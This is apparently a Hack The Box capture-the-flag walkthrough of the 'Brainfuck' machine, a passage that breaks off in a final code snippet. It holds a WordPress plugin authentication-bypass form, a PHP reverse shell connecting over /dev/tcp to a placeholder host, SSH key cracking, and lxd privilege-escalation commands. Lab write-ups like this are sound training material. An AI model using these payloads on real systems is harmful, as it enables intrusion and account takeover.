# Hack The Box - BrainFuck Walkthrough without Metasploit

![Brainfuck](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQpicu8-IAErf9fHO3h%2F-MQqSNRJbgidbNfT2ex8%2Fimage.png?alt=media\&token=dd59b4e1-280f-4312-964d-6e728d811df6)

## Enumeration

We will use **nmapAutomator** script for this box:

{% embed url="<https://github.com/21y4d/nmapAutomator>" %}

It's a really useful, easy-to-use script: it quickly shows us the open ports and then runs some basic scans against them (nmap, gobuster, nikto, smbmap, wpscan, among others), so it is handy to leave running in the background while we work on the open ports. But **remember** that sometimes we **will** have to run tools such as gobuster manually with other wordlists in order to find pages that are not in the wordlist this script uses: ***enumeration scripts are useful, but we shouldn't rely on them completely.***

We will run it with the **All** option, which runs every scan consecutively; it is the most complete, but also the one that takes the longest:

```
./nmapAutomator.sh 10.10.10.17 All
```

The Basic Nmap scan returns the following:

![Nmap Basic Scan](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQq_ac2Qo0mdrjBEKlk%2F-MQqaFYFgR61-4sBIxNn%2Fimage.png?alt=media\&token=0e60fd1b-5c27-4df6-baf0-7edad80f918e)

### Ports

We have the following ports open:

#### 25, 110, 143

These ports are all mail related (SMTP, POP3 and IMAP). For now we will leave them alone, since another port offers a potentially better attack vector.

#### 443

This port is HTTPS, so let's see if there is anything interesting on it:

![Nginx Welcome page](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQq_ac2Qo0mdrjBEKlk%2F-MQqaZmy7kC0MbBKw1YL%2Fimage.png?alt=media\&token=6c2a0b84-1248-49e4-8204-25a5e636a925)

The index page is titled Welcome to nginx!. This is what nginx serves when the Host header of the request does not match any configured virtual host: the real site is only served when we ask for the right hostname, and a request made by IP address falls through to the default page.

To get past this we need to figure out which hostname (or hostnames) the server expects and map them to this IP address in our /etc/hosts file. The previous nmap scan already gives us three candidates, taken from the names in the TLS certificate served on port 443:

![Hostnames Discovered](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQq_ac2Qo0mdrjBEKlk%2F-MQqbbrvhjhfRKYu67tl%2Fimage.png?alt=media\&token=320629b6-f5de-46c9-a567-c2c219d92e7b)

### Adding hostnames

On this machine we do need to add the discovered hostnames to /etc/hosts in order to visit the different sites, one line mapping 10.10.10.17 to brainfuck.htb, www.brainfuck.htb and sup3rs3cr3t.brainfuck.htb:

```
sudo nano /etc/hosts
```

![/etc/hosts entry](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQq_ac2Qo0mdrjBEKlk%2F-MQqdlFwvfBZiauxdPsR%2Fimage.png?alt=media\&token=89f5a953-ccba-46a6-b31c-6ec08f84f515)

### Wordpress Page

On <https://www.brainfuck.htb> or <https://brainfuck.htb> we reach the following web page:

![Wordpress page](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQq_ac2Qo0mdrjBEKlk%2F-MQqdLU7tzbP5bmmZkOi%2Fimage.png?alt=media\&token=1c2d5b35-2724-454d-aecd-0364a8eeb9c4)

It's a WordPress site and we can already see a username, **orestis**. We will run WPScan in the background to look for vulnerabilities in this WordPress, with the following flags:

**--url** --> the URL of the WordPress site to scan

**--passwords** --> the wordlist used to brute-force the passwords of the users WPScan enumerates

```bash
wpscan --url https://brainfuck.htb/ --passwords /path/to/your/wordlist
```

![WPScan failed due SSL](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqelPuWYzRJnTlouvT%2F-MQqihzmQwrixelElR6j%2Fimage.png?alt=media\&token=702ae89d-fc48-4cb7-af50-3ead0d73f95d)

The scan fails: the box presents a TLS certificate our system does not trust, so WPScan refuses the **HTTPS** connection. WPScan has a flag that skips certificate validation:

**--disable-tls-checks**

```
wpscan --url https://brainfuck.htb/ --passwords rockyou.txt --disable-tls-checks
```

The output is quite long, but these are the most important things we noticed:

#### Plugin

They have installed **wp-support-plus-responsive-ticket-system**:

![Plugins installed](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqjiT7A9rgiSTgfEDj%2F-MQqvy1hoKcvcTobZyl3%2Fimage.png?alt=media\&token=2872bc15-5fe2-41e3-94ea-360d8bc02c9f)

And we also know the version:

![WP Support Plus Responsive Ticket System Plugin Version](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqjiT7A9rgiSTgfEDj%2F-MQqw7IhjinPetT49xSr%2Fimage.png?alt=media\&token=059c84a7-f19f-4993-97c6-3d957f9ed9c5)

With a quick search:

```
searchsploit WP Support Plus
```

![Vulnerable Plugin](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqjiT7A9rgiSTgfEDj%2F-MQqx6HwSOJcLTnGCmRh%2Fimage.png?alt=media\&token=f7fa8b0f-ac70-4cec-a871-0f0cf51798f7)

#### Users

![Wordpress Usernames](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqjiT7A9rgiSTgfEDj%2F-MQqlegfXxwF69P8x5tx%2Fimage.png?alt=media\&token=9605ba81-e8e1-44d8-a18a-b50993acc29d)

We couldn't brute-force any password, but we have two users and a vulnerable plugin. The searchsploit entry comes with a Proof of Concept:

![Vulnerable Plugin PoC](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQr0tg1x6uIh_2vubE1%2Fimage.png?alt=media\&token=852fe04c-e406-4ad0-8357-c888d745e18b)

We edit the Proof of Concept so it points at our target. It is just an HTML form that POSTs to WordPress' admin-ajax.php with the plugin's loginGuestFacebook action and the username we want to become; the vulnerable handler logs us in as that user without asking for a password:

```markup
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="administrator">
        <input type="hidden" name="email" value="sth">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>
```

We serve the file with a quick Python HTTP server so we can open it in the browser:

![Python Http Server](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrC5p5enKYScdy7RVv%2Fimage.png?alt=media\&token=05915480-2de7-486b-b704-82b531b63db5)

And access the file:

![PoC html File](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrCKoSlusWm8e7crJX%2Fimage.png?alt=media\&token=c31c8b60-d6b8-409a-af5c-dd0de4d4c8c5)

We press Login and go back to the WordPress page; after refreshing it we will see we are now logged in as administrator:

![Wordpress Administrator](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrKS2lic3jvK_TOwg2%2Fimage.png?alt=media\&token=b0a5364e-ba24-475c-9042-c0dd3d29d7bf)

Sadly there isn't much to do as **administrator**, but if we repeat the process with the other user, **admin**:

![Wordpress Admin](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrMF5YtWWguKkv0T-B%2Fimage.png?alt=media\&token=87f8af7c-72eb-407f-9814-08679dea7836)

If we go to Dashboard:

![Wordpress Dashboard](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrMV0d1QkMhjhPAaCb%2Fimage.png?alt=media\&token=16ca74e6-f1c7-46e7-ad55-315aa0d59133)

Normally, the first thing we would do after logging in with an administrator account in WordPress is one of two things. The first is to modify a theme template in order to get a reverse shell:

Going to Appearance --> Editor --> selecting a template (for example 404.php) and replacing its content with a reverse shell such as pentestmonkey's:

{% embed url="<https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php>" %}

And then updating the file so we can trigger it from our browser.

![Trying to edit 404 template](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsnEfDSm7RPodnnuI2%2F-MQt80ezo9CwI5yOhBC2%2Fimage.png?alt=media\&token=de5a31e1-e39f-422e-aa39-06617ae3b9f5)

As we can see, the files are not writable, so this is not an option.

Our second choice would be to upload a malicious plugin. To do that we first create the "plugin", a file evilplugin.php, and then zip it:

```php
<?php
   // Spawns a reverse shell back to our listener as soon as the plugin file is loaded
   exec("/bin/bash -c 'bash -i >& /dev/tcp/your-ip/port 0>&1'");
?>
```

![Evil Plugin](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsnEfDSm7RPodnnuI2%2F-MQtBFRnMfkPFloLf7vP%2Fimage.png?alt=media\&token=45acfe14-544b-4ede-9116-9d82bb99fe26)

![Adding a new plugin](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsnEfDSm7RPodnnuI2%2F-MQtApVe7-JZieWbqFEU%2Fimage.png?alt=media\&token=5a19e13f-500c-4f46-b58a-48f0236f8fe4)

But sadly it doesn't load and keeps giving us an error page.

Inside the Dashboard, if we go to Settings we will find Easy WP SMTP, and there we can see a username and a password:

![Easy WP SMTP Settings](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrN81VSW17expjX5rD%2Fimage.png?alt=media\&token=d8c8ca8d-ab92-4007-8e98-c661b49bb4be)

The username is **orestis** and the password is masked... right? Well, unless we right-click and view the page source: the password field is rendered with its value in the HTML, so the masking only hides it visually.

![Username and Password in Cleartext](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrNifPv6AywvpFSIXY%2Fimage.png?alt=media\&token=258c34ef-7a05-4d4e-bc7f-15be4220f476)

Now we have a username and password for SMTP (the mail service):

**orestis** // **kHGuERB29DNiNE**

#### Wordpress Side Note

From time to time WPScan will ask to update its database; I recommend taking those extra seconds to do it:

![Update WPScan](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqelPuWYzRJnTlouvT%2F-MQqfbUg_MV-Zmb_e_L1%2Fimage.png?alt=media\&token=e2ec6825-44fe-46a9-8c8d-e3e63f14c810)

I really do recommend taking the 5 minutes it takes to create a free account (or a paid one if you need to do lots of scans) and get your WPScan API key, so you can get the most out of this great tool:

{% embed url="<https://wpscan.com/wordpress-security-scanner>" %}

### Mail Application - Evolution

It seems we need a mail client in order to use our mail credentials. I decided to install **evolution**; installation is quite simple:

```bash
sudo apt-get install evolution
```

Once installed we need to configure our new mail, we open up evolution and go to:

File --> New --> Mail Account

![Evolution Mail Account Configuration](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQr_9Iuqz6U42Y69LBr%2Fimage.png?alt=media\&token=1e12b8d3-1183-41c1-ad38-2f191bd13b80)

As Identity we will use **orestis** and as email address **<orestis@brainfuck.htb>**

![Identity Configuration](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrmUj7T2B1yJ7vyNgb%2Fimage.png?alt=media\&token=f2f5b3d2-1014-4ad0-923f-3d7f81e8cb52)

On Receiving Email we configure the following:

Server Type --> **IMAP**

Server --> **brainfuck.htb**

Port --> **143**

Username --> **orestis**

Encryption method --> **No encryption**

![Receiving Email Configuration](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrltWqCUXwziULUiSg%2Fimage.png?alt=media\&token=4b3a912d-7ff1-42c3-9599-aef468b34b5b)

We can leave Receiving Options as they are by default:

![Receiving Options](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQrnsXz6nhCFxlgIY4Y%2Fimage.png?alt=media\&token=b699e1a4-e92a-4f41-b02e-f6b83cf13dfa)

We will configure the Sending Email as follows:

Server Type --> **SMTP**

Server --> **brainfuck.htb**

Port --> **25**

Encryption method --> **No encryption**

![Sending Email Configuration](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQqxvkf6859E77tJXsz%2F-MQroBGqjQUTG-7bdyog%2Fimage.png?alt=media\&token=375ef658-42a8-478f-94e4-31733c219412)

Clicking on next we will be able to see our new account summary:

![Account Summary](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQroh4a4npUtah0sbgW%2F-MQrorLV-q9KFC_mMDtI%2Fimage.png?alt=media\&token=5bfdc565-d30e-4fd7-bd96-5728bf8ef34b)

We click on Next and Apply the changes, a pop-up will appear asking us for the password:

![Mail Authentication Request](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQroh4a4npUtah0sbgW%2F-MQrp612zMxvZz4Lqiaa%2Fimage.png?alt=media\&token=e223ce0d-a9c8-4cfd-9a15-767202eb8a8a)

Once we enter our password we can see our inbox, which has some mails:

![Forum Access Details](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQroh4a4npUtah0sbgW%2F-MQrqA3EuLlMH27waSXj%2Fimage.png?alt=media\&token=b3889441-e8a0-4822-84a5-18c92084a869)

We got a new password for the super secret forum we discovered before. It seems we are done with WordPress and it's time to move on to the Super Secret Forum with our user and password:

**orestis**  //  **kIEnnfEKJ#9UmdO**
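The GUI client is fine, but on an engagement it is often quicker to read the mailbox straight over the protocol. Here is an added Python example (not part of the original walkthrough) that talks plain IMAP to port 143 with the Easy WP SMTP credentials from this page, lists every message in INBOX read-only and prints sender, subject and body. The host, port and credentials are the ones on this page; the sample message at the bottom is constructed by me so the parsing part can be exercised offline, it is not the real mail from the box.

```python
"""Read the orestis mailbox over plain IMAP (added example, not from the walkthrough)."""
import email
import imaplib

# Assumptions taken from this page: IMAP on 143 without TLS, creds leaked by Easy WP SMTP.
HOST, PORT = "brainfuck.htb", 143
USER, PASSWORD = "orestis", "kHGuERB29DNiNE"


def body_text(msg):
    """Return the first text/plain part of a parsed email.message.Message, decoded."""
    for part in msg.walk():
        if part.get_content_type() == "text/plain":
            payload = part.get_payload(decode=True) or b""
            return payload.decode(part.get_content_charset() or "utf-8", errors="replace")
    return ""


def summarize(raw):
    """Parse one RFC 822 message (bytes) into the fields we care about."""
    msg = email.message_from_bytes(raw)
    return {"from": msg["From"], "subject": msg["Subject"], "body": body_text(msg).strip()}


def fetch_inbox(host=HOST, port=PORT, user=USER, password=PASSWORD):
    """Log in over cleartext IMAP, select INBOX read-only and return every message."""
    conn = imaplib.IMAP4(host, port)           # no TLS: the box offers none on 143
    try:
        conn.login(user, password)
        conn.select("INBOX", readonly=True)    # read-only: leave the mailbox as we found it
        status, data = conn.search(None, "ALL")
        if status != "OK":
            return []
        messages = []
        for num in data[0].split():
            status, fetched = conn.fetch(num, "(RFC822)")
            if status == "OK":
                messages.append(summarize(fetched[0][1]))
        return messages
    finally:
        conn.logout()


# Constructed sample (not the real mail from the box) so the parser can be run offline.
SAMPLE = (
    b"From: root@brainfuck.htb\r\n"
    b"To: orestis@brainfuck.htb\r\n"
    b"Subject: Forum access details\r\n"
    b"Content-Type: text/plain; charset=utf-8\r\n"
    b"\r\n"
    b"Username: orestis\r\n"
    b"Password: kIEnnfEKJ#9UmdO\r\n"
)


if __name__ == "__main__":
    for m in fetch_inbox():
        print(f"From: {m['from']}\nSubject: {m['subject']}\n{m['body']}\n")
```

Everything here goes over the wire in cleartext, which is exactly why the credentials were usable in the first place: anyone on the path could have read them too.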

### Super Secret Forum page

On <https://sup3rs3cr3t.brainfuck.htb> we have the following page:

![Super Secret Forum](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQq_ac2Qo0mdrjBEKlk%2F-MQqef26dqd2MmE0B7mt%2Fimage.png?alt=media\&token=f542ce8b-d38f-4808-b8d7-7f59583fa6e2)

We log in with the new credentials:

![Super Secret Log In Forum](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQroh4a4npUtah0sbgW%2F-MQrquYdWboGGneeVFkM%2Fimage.png?alt=media\&token=a03db7e2-679e-420b-8e8c-5d3cf02bf22f)

There are some interesting conversations going on in this forum:

![SSH Access messages](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQroh4a4npUtah0sbgW%2F-MQrrHkJF58RUewcujFX%2Fimage.png?alt=media\&token=9c84248c-b936-4f30-a8ef-ad173aa6e549)

So it seems they are going to use some kind of encryption to communicate in another thread...

![Encrypted thread](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQroh4a4npUtah0sbgW%2F-MQrsGNx4bOkXkbNdPbX%2Fimage.png?alt=media\&token=dd33ca5f-f4e1-4501-b0f3-3cc60c84089e)

Now we need to find out what kind of cipher they are using. We can try to narrow it down with this online tool:

{% embed url="<https://www.boxentriq.com/code-breaking/cipher-identifier>" %}
Cipher Identifier
{% endembed %}

The user signs every post the same way, "**Orestis - Hacking for fun and profit**", and in the encrypted thread we can see something with exactly the same shape, "**Wejmvse - Fbtkqal zqb rso rnl cwihsf**": same word lengths, same punctuation, only the letters change. That gives us a chunk of known plaintext with its matching ciphertext.

![](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQroh4a4npUtah0sbgW%2F-MQrv8BCCueO2SL5JU7u%2Fimage.png?alt=media\&token=5b8de185-a626-46cd-ba2d-53aa0e7e2434)

#### Decipher

Now we can be "*fairly*" sure it's a [Vigenère cipher](https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher), so let's write a Python script to recover the key needed to decipher it:

{% embed url="<https://github.com/4st1nus/Vigenere-Cipher-Key-Finder>" %}

```python
#!/usr/bin/env python3

print("Vigenere Decipher\n")
print("Text must be entered without Symbols or Space\n")

plain = input("Enter Known Text: ")
encrypted = input("Enter the corresponding Encrypted text to the known text: ")
password = ""

# Key letter n = (cipher_n - plain_n) mod 26, shifted into 'a'..'z' (code points 97..122).
# Both inputs are lower-cased first so the subtraction works even if the cases differ.
for p, c in zip(plain.lower(), encrypted.lower()):
    x = ((ord(c) - ord(p)) % 26) + 97
    password += chr(x)

print(password)
```

#### Script explanation

In order to decrypt the text we first need the key/password. To do so we need *some plaintext together with the ciphertext it corresponds to* (a known-plaintext attack). In our case the user keeps using the same signature, so we will use that to get our key.

If you want to know something more about Vigenère cipher:

{% embed url="<https://crypto.stackexchange.com/questions/12195/find-the-key-to-a-vigen%C3%A8re-cipher-given-known-ciphertext-and-plaintext>" %}

Following that link, the n-th letter of the key is the n-th ciphertext letter minus the n-th plaintext letter, modulo 26 (the key repeats as many times as necessary, so what we actually recover is the key stream, one key letter per plaintext letter):

$$
K_n = (E_n - P_n) \bmod 26
$$

Since we cannot subtract one string from another in Python, we use the **ord()** function, which returns the integer code point of a character, and apply the formula to get each key letter. We add 97 at the end because in ASCII/Unicode the lowercase Latin alphabet starts at 97 ('a'). Note that the subtraction only gives the right answer when both characters have the same case, which is why it is safer to lower-case both inputs first.

Our script will repeat this process for each letter on the plain text given.

We will use the user's signature **OrestisHackingforfunandprofit** and the corresponding ciphertext **PieagnmJkoijegnbwzwxmlegrwsnn** (spaces and punctuation removed):

![Python Decipher script](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQs7Pf2JShh9nCeZJQC%2F-MQs89dV2oakKLKBsNcn%2Fimage.png?alt=media\&token=2953d82e-248f-47d5-bee4-1abafcaa5775)

The output repeats with a period of 11 letters. Because the signature does not sit at the very start of the post, what we recover is the key stream starting part-way through the key, i.e. a rotation of it; lining it up from the start of the message gives us "**fuckmybrain**". Now we go back to <https://www.boxentriq.com/code-breaking/vigenere-cipher> to decrypt the messages with that key. The one we are interested in is: "**mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp\_ptr**"
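To make the whole procedure reproducible offline, here is an added Python example (not from the original walkthrough) that performs the known-plaintext key recovery described above, finds the period of the recovered key stream, lists its rotations, and then decrypts with the key. It uses only strings that appear on this page (the signature, its two encrypted forms and the encrypted URL); the function names are my own. Non-letters pass through untouched and do not advance the key, which is how the online tool treats them.

```python
"""Vigenere known-plaintext key recovery and decryption (added example)."""
import string

ALPHA = string.ascii_lowercase

# Known plaintext / ciphertext pairs taken from the forum posts on this page.
SIGNATURE = "Orestis - Hacking for fun and profit"
SIGNATURE_ENC_1 = "Wejmvse - Fbtkqal zqb rso rnl cwihsf"
SIGNATURE_ENC_2 = "PieagnmJkoijegnbwzwxmlegrwsnn"
URL_ENC = "mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptr"


def letters(text):
    """Keep only ASCII letters, lower-cased: the cipher ignores spaces and punctuation."""
    return [c for c in text.lower() if c in ALPHA]


def key_stream(plain, cipher):
    """K_n = (E_n - P_n) mod 26 for every letter of the known plaintext."""
    p, c = letters(plain), letters(cipher)
    if len(p) != len(c):
        raise ValueError("plaintext and ciphertext must have the same number of letters")
    return "".join(ALPHA[(ALPHA.index(ci) - ALPHA.index(pi)) % 26] for pi, ci in zip(p, c))


def smallest_period(stream):
    """Shortest repeating unit of the key stream, i.e. the key length."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return n
    return len(stream)


def key_rotations(stream):
    """All rotations of the repeating unit: one of them is the real key.

    The recovered stream starts wherever the known text starts in the message,
    so without knowing that offset we only learn the key up to rotation.
    """
    n = smallest_period(stream)
    unit = stream[:n]
    return [unit[i:] + unit[:i] for i in range(n)]


def vigenere(text, key, decrypt=False):
    """Shift each ASCII letter by the matching key letter; non-letters pass
    through and do not consume a key position. Case is preserved."""
    out, i = [], 0
    for ch in text:
        if ch.lower() not in ALPHA:
            out.append(ch)
            continue
        shift = ALPHA.index(key[i % len(key)].lower())
        if decrypt:
            shift = -shift
        base = ord("A") if ch.isupper() else ord("a")
        out.append(chr((ord(ch) - base + shift) % 26 + base))
        i += 1
    return "".join(out)


if __name__ == "__main__":
    stream = key_stream(SIGNATURE, SIGNATURE_ENC_2)
    print("key stream :", stream)
    print("key length :", smallest_period(stream))
    print("candidates :", key_rotations(stream))
    print("decrypted  :", vigenere(URL_ENC, "fuckmybrain", decrypt=True))
```

Running it shows why the script output looks rotated: the signature is 29 letters long but the key repeats every 11, and only one of the 11 rotations, fuckmybrain, turns the mnvze:// message into a valid https:// URL. The other encrypted signature on the page is consistent with the same key at a different offset, which is a good sanity check before trusting the result.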

![Vigenere Online Tool](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQs7Pf2JShh9nCeZJQC%2F-MQsCsSH1pMeQeoKknFy%2Fimage.png?alt=media\&token=6a84daba-2089-4a51-9ffc-f6a640b38b20)

Now we can download what looks like an SSH private key. Since the site is HTTPS with a certificate our system does not trust, we have to tell wget to skip certificate validation with **--no-check-certificate**:

```bash
wget https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa --no-check-certificate
```

![id\_rsa file](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQs7Pf2JShh9nCeZJQC%2F-MQsFxwVqcO8pPaK2Gk5%2Fimage.png?alt=media\&token=6412ec3f-8d12-4bcf-ae44-7735587b5c0b)

SSH refuses to use a private key that other users can read, so we have to restrict the permissions on id\_rsa:

```bash
chmod 600 id_rsa
```

And now we try to log in with it:

```bash
ssh -i id_rsa orestis@10.10.10.17
```

And it fails! The key is protected with a passphrase... luckily we have John The Ripper: ssh2john converts the key into a hash format John understands, and then we run a wordlist against it:

```bash
python /usr/share/john/ssh2john.py id_rsa > pass

john --wordlist=/password_list/rockyou.txt pass
```

If John has already cracked this hash in a previous run it will not print the passphrase again (it is stored in its pot file); in that case we retrieve it with:

```bash
john --show pass
```

![SSH Key password](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQs7Pf2JShh9nCeZJQC%2F-MQsIJcAuOENVD014gvF%2Fimage.png?alt=media\&token=219deb24-db7d-44e6-b561-41e52072ef04)

Now we can log in with the passphrase "**3poulakia!**"

![Foothold](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsIpCrfpXP9iQSXnOQ%2F-MQs_QQOTrWxCR7fnj6g%2Fimage.png?alt=media\&token=af1bfe70-a692-43a9-b166-3a86fc7f02bf)

We are finally in and we can grab our user flag! But something more important quickly catches our eye: we are a member of the **lxd** group, and there are some files, **encrypt.sage, debug.txt, output.txt**, in our home folder...

## Privilege Escalation

First we start a Python HTTP server on our machine (from the directory containing the files we want to transfer) so that we can grab some enumeration scripts from the victim:

```bash
python -m SimpleHTTPServer 80
# or, with Python 3:
python3 -m http.server 80
```

On the victim we download linpeas.sh and chmod +x it so we can execute it:

{% embed url="<https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite>" %}
Awesome Scripts Suite for Privilege Escalation (really awesome :D )
{% endembed %}

```bash
wget 10.10.14.3/linpeas.sh
chmod +x linpeas.sh
```

Out of all the linpeas.sh output, the most interesting thing is what we already noticed when we logged in:

![lxd group](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsIpCrfpXP9iQSXnOQ%2F-MQsSCU9ELjaRwrc5T31%2Fimage.png?alt=media\&token=93a8dbbd-2afd-475d-98ab-98e8aa47313a)

### lxd Group Exploitation

LXD is a next-generation system container manager: its containers behave much like virtual machines but are built on Linux containers. If you want to know more about it:

{% embed url="<https://linuxcontainers.org/lxd/introduction/>" %}

To exploit our group membership we will use **Method 1** of this guide:

{% embed url="<https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation>" %}
lxd/lxc Group Privilege Escalation
{% endembed %}

Once our Alpine image is ready (built as described in the guide) we transfer it to the victim:

![Transfer Linux Container](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsIpCrfpXP9iQSXnOQ%2F-MQsUZv4cgpz8A0StAcA%2Fimage.png?alt=media\&token=2a991a1e-0c37-42e3-85ff-9cedd69c6484)

We import the image with an alias:

```bash
lxc image import ./alpine.tar.gz --alias Evil
```

Once imported we initialize a container from it and make it **privileged** (this is the important part: in a privileged container root is uid 0 on the host, and membership in the lxd group lets us create one):

```bash
lxc init Evil ignite -c security.privileged=true
```

Now we attach the host's root filesystem to the container as a disk device, mounted at /mnt/root:

```bash
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
```

Finally we start it and get a shell inside:

```bash
lxc start ignite
lxc exec ignite /bin/sh
```

If we have followed these steps we are root inside the container. Because the container is **privileged**, root inside it is real root on the host, and the whole host filesystem is mounted under /mnt/root, so we can read the actual root directory:

```bash
cd /mnt/root/root
```

and grab the root flag.

## Pwnd

![We are Root](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsIpCrfpXP9iQSXnOQ%2F-MQsWXpSzrFpPybGUnCs%2Fimage.png?alt=media\&token=6c7dc734-3a2b-4eb4-9141-a251d93a1943)

## Extra Ball

So... if we remember, we had some files in our home directory: **encrypt.sage**, **debug.txt** and **output.txt**

```python
nbits = 1024

password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))

